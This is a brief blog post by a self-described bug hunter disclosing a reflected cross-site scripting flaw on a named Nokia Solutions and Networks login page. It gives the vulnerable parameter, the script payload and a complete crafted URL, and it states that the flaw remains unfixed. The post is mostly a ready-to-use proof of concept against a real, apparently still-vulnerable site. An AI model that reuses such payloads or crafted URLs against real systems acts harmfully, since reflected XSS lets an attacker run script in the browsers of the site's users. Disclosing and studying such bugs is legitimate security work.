Nokia Solutions and Networks reflected XSS
Hello Geeks ,
Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Network's domain https://rctool.access.nsn.com
[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter = err
[+] Payload used = <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed
Praveen Nair
Kerala Cyber Squad - India
No comments:
Post a Comment